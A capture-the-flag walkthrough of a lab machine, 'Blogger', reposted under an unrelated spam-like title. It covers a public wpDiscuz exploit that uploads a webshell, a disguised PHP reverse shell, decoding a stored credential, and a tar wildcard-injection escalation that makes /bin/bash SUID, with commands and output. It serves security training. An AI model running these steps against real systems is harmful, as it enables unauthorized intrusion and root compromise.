
Which Beijing Web Design Company Is Good_Reasons for Building a Company Website_What Online Sales Models Exist_Game Promoter Scams

2025/2/8 0:26:56 Source: https://blog.csdn.net/N61320/article/details/145450247
Key points
  • Path brute-forcing to find valuable clues
  • PHP reverse shell disguised as an image to get a reverse connection
  • Nested base64 decoding to recover a password
  • Privilege escalation through a tar backup job
Detailed steps

Start with nmap as usual. The SSH version is fairly old, but it does not give us anything more useful, so attention goes to port 80.

Nmap scan report for 192.168.177.217
Host is up (0.42s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 95:1d:82:8f:5e:de:9a:00:a8:07:39:bd:ac:ad:d3:44 (RSA)
|   256 d7:b4:52:a2:c8:fa:b7:0e:d1:a8:d0:70:cd:6b:36:90 (ECDSA)
|_  256 df:f2:4f:77:33:44:d5:93:d7:79:17:45:5a:a1:36:8b (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Blogger | Home
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)

Port 80 does not look like much either, but path brute-forcing found a few directories that need to be checked one by one.

# Dirsearch started Wed Feb  5 08:26:27 2025 as: /usr/lib/python3/dist-packages/dirsearch/dirsearch.py -u http://192.168.132.217 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
301   319B   http://192.168.132.217/images    -> REDIRECTS TO: http://192.168.132.217/images/
301   319B   http://192.168.132.217/assets    -> REDIRECTS TO: http://192.168.132.217/assets/
301   316B   http://192.168.132.217/css    -> REDIRECTS TO: http://192.168.132.217/css/
301   315B   http://192.168.132.217/js    -> REDIRECTS TO: http://192.168.132.217/js/
403   280B   http://192.168.132.217/server-status

Surprisingly, a blog directory turned up under assets/fonts. blogger.pg has to be added to /etc/hosts before it loads properly, but it is clearly a WordPress instance.

A wpscan run shows that the wpDiscuz plugin has a file upload vulnerability.

Searching for an exploit turned up https://github.com/hev0x/CVE-2020-24186-wpDiscuz-7.0.4-RCE, which can give a reverse shell.

C:\home\kali\Documents\OFFSEC\play\Blogger\CVE-2020-24186-wpDiscuz-7.0.4-RCE-main> sudo python wpDiscuz_RemoteCodeExec.py -u http://blogger.pg/assets/fonts/blog -p ?p=29    
---------------------------------------------------------------
[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution
[-] File Upload Bypass Vulnerability - PHP Webshell Upload
[-] CVE: CVE-2020-24186
[-] https://github.com/hevox
---------------------------------------------------------------
[+] Response length:[59354] | code:[200]
[!] Got wmuSecurity value: e8f3a1bf79
[!] Got wmuSecurity value: 29
[+] Generating random name for Webshell...
[!] Generated webshell name: wlitvttntqthjma
[!] Trying to Upload Webshell..
[+] Upload Success... Webshell path:http://blogger.pg/assets/fonts/blog/wp-content/uploads/2025/02/wlitvttntqthjma-1738722269.2139.php
> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)

You can also do this by hand: modify php-reverse-shell.php and upload it as an image under a post to get the reverse shell; remember to add the GIF89a; header at the top of the file.

Once the reverse shell is up, upload linpeas.sh and pspy64 and run them.

The pspy64 output shows /usr/local/bin/backup.sh being run by root as a cron job; it uses tar to back up local.txt under /home/james/. At this point we do not have james's password.

pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
[pspy ASCII-art banner omitted]
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
......
......
2025/02/05 01:10:01 CMD: UID=0    PID=20223  | /bin/sh /usr/local/bin/backup.sh 
2025/02/05 01:10:01 CMD: UID=0    PID=20222  | /bin/sh -c /usr/local/bin/backup.sh 
2025/02/05 01:10:01 CMD: UID=0    PID=20224  | tar czf /tmp/backup.tar.gz local.txt 

The linpeas.sh output, however, shows a .creds file with the following content: ';u22>'v$)='2a#B&>`c'=+C(?5(|)q**bAv2=+E5s'+|u&I'vDI(uAt&=+(|`yx')Av#>'v%?}:#=+)';y@%'5(2vA!'<y$&u"H!"ll

╔══════════╣ All relevant hidden files (not in /sys/ or the ones listed in the previous check) (limit 70)
-rw-r--r-- 1 root root 104 Jan 17  2021 /opt/.creds

It looks encrypted or encoded. In CyberChef it decodes with ROT47 followed by base64, which yields the password of the james user.
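The ROT47-plus-base64 chain above, written out as an added Python example (not code from the original post): ROT47 is applied once, then base64 layers are peeled off until the output stops being valid base64. The .creds blob is embedded exactly as shown in the linpeas output; the layer limit and the stop heuristic are my own assumptions.

```python
import base64
import binascii

# Contents of /opt/.creds exactly as printed in the linpeas output above
# (the 104-byte file minus its trailing newline).
CREDS = """';u22>'v$)='2a#B&>`c'=+C(?5(|)q**bAv2=+E5s'+|u&I'vDI(uAt&=+(|`yx')Av#>'v%?}:#=+)';y@%'5(2vA!'<y$&u"H!"ll"""


def rot47(text: str) -> str:
    """ROT47 shifts every printable ASCII character (33..126) by 47 within
    that range; applying it twice returns the original text."""
    out = []
    for ch in text:
        code = ord(ch)
        if 33 <= code <= 126:
            code = 33 + (code - 33 + 47) % 94
        out.append(chr(code))
    return "".join(out)


def peel_base64(data: str, max_layers: int = 10) -> tuple[str, int]:
    """Base64-decode repeatedly until the result is no longer strict base64 or
    is not printable ASCII. Returns (innermost text, layers removed).
    max_layers is an assumed safety bound, not something the file dictates."""
    current, layers = data, 0
    while layers < max_layers:
        try:
            decoded = base64.b64decode(current, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            break  # characters such as ':' or '$' are not base64: this is plaintext
        if not decoded.isprintable():
            break  # binary output means the previous layer was the real content
        current, layers = decoded, layers + 1
    return current, layers


def decode_creds(blob: str) -> tuple[str, int]:
    """Undo the chain used for /opt/.creds: ROT47 first, then nested base64."""
    return peel_base64(rot47(blob.strip()))


if __name__ == "__main__":
    secret, layers = decode_creds(CREDS)
    print(f"{layers} base64 layer(s) removed -> {secret}")
```

For this blob five base64 layers come off and the loop stops on the ':' and '$' characters of the recovered credential; a secret made only of base64-alphabet characters would need a different stop rule.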

Use the recovered password to switch to james and create files under /home/james to escalate privileges: the idea is to create checkpoint files so that the tar command calls the given script when it runs.

www-data@ubuntu-xenial:/opt$ su james
su james
Password: S3cr37_P@$$W0rd
james@ubuntu-xenial:/opt$ cd /home/james
james@ubuntu-xenial:~$ id
id
uid=1002(james) gid=1002(james) groups=1002(james)
james@ubuntu-xenial:~$ echo "chmod +s /bin/bash" >shell.sh
echo "chmod +s /bin/bash" >shell.sh
james@ubuntu-xenial:~$ ls -lart
ls -lart
total 28
drwxr-xr-x 5 root  root  4096 Jan 17  2021 ..
-rw-r--r-- 1 james james  655 Jan 17  2021 .profile
-rw-r--r-- 1 james james 3771 Jan 17  2021 .bashrc
-rw-r--r-- 1 james james  220 Jan 17  2021 .bash_logout
-rw-r--r-- 1 root  root    33 Feb  5 00:08 local.txt
-rw-rw-r-- 1 james james   19 Feb  5 02:02 shell.sh
drwxr-xr-x 2 james james 4096 Feb  5 02:02 .
james@ubuntu-xenial:~$ cat shell.sh
cat shell.sh
chmod +s /bin/bash
james@ubuntu-xenial:~$ chmod +x shell.sh
chmod +x shell.sh
james@ubuntu-xenial:~$ touch -- "--checkpoint-action=exec=sh shell.sh"
touch -- "--checkpoint-action=exec=sh shell.sh"
james@ubuntu-xenial:~$ touch -- "--checkpoint=1"
touch -- "--checkpoint=1"
james@ubuntu-xenial:~$ ls -lart
ls -lart
total 28
drwxr-xr-x 5 root  root  4096 Jan 17  2021 ..
-rw-r--r-- 1 james james  655 Jan 17  2021 .profile
-rw-r--r-- 1 james james 3771 Jan 17  2021 .bashrc
-rw-r--r-- 1 james james  220 Jan 17  2021 .bash_logout
-rw-r--r-- 1 root  root    33 Feb  5 00:08 local.txt
-rwxrwxr-x 1 james james   19 Feb  5 02:02 shell.sh
-rw-rw-r-- 1 james james    0 Feb  5 02:03 --checkpoint-action=exec=sh shell.sh
-rw-rw-r-- 1 james james    0 Feb  5 02:03 --checkpoint=1
drwxr-xr-x 2 james james 4096 Feb  5 02:03 .

After a short wait the privilege escalation succeeds.

james@ubuntu-xenial:~$ ls -l /bin/bash
ls -l /bin/bash
-rwxr-xr-x 1 root root 1037528 Jul 12  2019 /bin/bash
james@ubuntu-xenial:~$ ls -l /bin/bash
ls -l /bin/bash
-rwsr-sr-x 1 root root 1037528 Jul 12  2019 /bin/bash
james@ubuntu-xenial:~$ /bin/bash -p
/bin/bash -p
bash-4.3# cat /root/proof.txt
cat /root/proof.txt
13618d6242920b9f53a9623217760e49